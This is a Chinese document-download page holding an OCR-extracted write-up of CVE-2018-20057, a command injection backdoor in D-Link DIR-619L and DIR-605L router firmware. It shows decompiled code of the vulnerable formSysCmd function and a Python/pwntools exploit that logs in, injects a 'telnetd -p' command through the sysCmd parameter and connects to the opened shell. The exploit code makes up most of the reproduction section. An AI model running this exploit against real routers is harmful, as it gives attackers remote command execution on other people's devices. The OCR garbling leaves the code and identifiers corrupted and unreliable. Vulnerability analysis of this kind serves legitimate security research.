欢迎来到课桌文档! | 帮助中心 课桌文档-建筑工程资料库
课桌文档
全部分类
  • 党建之窗>
  • 感悟体会>
  • 百家争鸣>
  • 教育整顿>
  • 文笔提升>
  • 热门分类>
  • 计划总结>
  • 致辞演讲>
  • 在线阅读>
  • ImageVerifierCode 换一换
    首页 课桌文档 > 资源分类 > DOCX文档下载  

    (CVE-2018-20057)D-Link DIR-619L&605L 命令注入漏洞.docx

    • 资源ID:641663       资源大小:17.08KB        全文页数:3页
    • 资源格式: DOCX        下载积分:5金币
    快捷下载 游客一键下载
    会员登录下载
    三方登录下载: 微信开放平台登录 QQ登录  
    下载资源需要5金币
    邮箱/手机:
    温馨提示:
    用户名和密码都是您填写的邮箱或者手机号,方便查询和重复下载(系统自动生成)
    支付方式: 支付宝    微信支付   
    验证码:   换一换

    加入VIP免费专享
     
    账号:
    密码:
    验证码:   换一换
      忘记密码?
        
    友情提示
    2、PDF文件下载后,可能会被浏览器默认打开,此种情况可以点击浏览器菜单,保存网页到桌面,就可以正常下载了。
    3、本站不支持迅雷下载,请使用电脑自带的IE浏览器,或者360浏览器、谷歌浏览器下载即可。
    4、本站资源下载后的文档和图纸-无水印,预览文档经过压缩,下载后原文更清晰。
    5、试题试卷类文档,如果标题没有明确说明有答案则都视为没有答案,请知晓。

    (CVE-2018-20057)D-Link DIR-619L&605L 命令注入漏洞.docx

    (CVE-2018-20057) D-Link DIR-619L&605L 命令注入漏洞一、漏洞简介D-LINK 的 D1R-619L Rev.B 2.06B1 版本之前和 DIR-605L Rev.B 2.12B1 版本之前的 设备,在binboa文件的formSysCmd函数存在后门,导致攻击者在身份认证后 可以通过访问http:/ip/goform/fOrmSysCmd并指定sysCmd参数,从而实现远程命令注入。固件下载地址:ftp:/本漏洞的路由器运行环境与CVE-2018-20056相同。二、漏洞影响D-LINK 的 DIR-619L Rev.B 2.06B1 版本之前和 DIR-605L Rev.B 2.12B1 版本之前的 设备。三、复现过程漏洞分析查看ghidra中的反编译代码,在formSysCmd中,首先获取SySCmd参数,然后 通过SnPrintf写入栈中变量,直接调用SyStem函数执行该参薪内容。void formSysCmd(undefined4 uParml) (undefined4 uVarl;char *pcVar2;char acStackl20 104;uVarl = WebsGetVar(uParmlj"submit-url"i&DAT_004ac874);获取post参数sysCmd,该参数可由用户控制pcVar2 = (char *)websGetVar(uParmlj,sysCmd"i&DAT 004ac874);if (*pcVar2 != 0) / sysCmd写入栈中,并调用system执行snprintf(acStackl20 100,%s 2>&1 > %s”,pcVar2,”tmpSySCmd.log"); system(acStackl20);)WebsRedirect(uParml,uVarl);return;漏洞复现该漏洞是在身份认证成功之后才可实现命令注入,需要先登录输入用户名和口令。由于是在qemu中模拟固件,通过apmib_get读取路由器本地配置无法实现,所以 在劫持了 apmib_get函数之后,login输入的用户名和密码暂时填为空。在真机上 操作时,换成真实的用户名和密码即可。import requestsimport sysimport structimport base64from pwn import *context(arch='mips',endian='big,log-level=,debug,)ip='192.168.84.129,port=101def IOgin(USer,password):postData = 'login-name,:''>'curTime,:'1234'j,FILECODE':,VER-CODE':, 'VERIFICATION-CODE':'','login_n': user,login_pass,:base64.b64encode(password)i)response = requests. post (,http:/'+ip+,goformformLogin,data=post Data)#print response.urldef syscmd(cmd):postData = 'sysCmd':cmd,'submit-url,:,1234,i)response = requests. post (,http:/,+ip+,goform/fOrmSysCmd'jdata=pos tData)#print response.urldef inter():p=remote(ipjport)p.interactive()if _name_ = ,_main_,:IOginr,一)危里庭实际的用户名和密码,例如admin 12345syscmd(,telnetd -p '+str(port)inter()另由于qemu模拟时,dev下没有Pty设备,导致telnet连接不能实现,但是端 口是已经打开了:

    注意事项

    本文((CVE-2018-20057)D-Link DIR-619L&605L 命令注入漏洞.docx)为本站会员(夺命阿水)主动上传,课桌文档仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知课桌文档(点击联系客服),我们立即给予删除!

    温馨提示:如果因为网速或其他原因下载失败请重新下载,重复下载不扣分。




    备案号:宁ICP备20000045号-1

    经营许可证:宁B2-20210002

    宁公网安备 64010402000986号

    课桌文档
    收起
    展开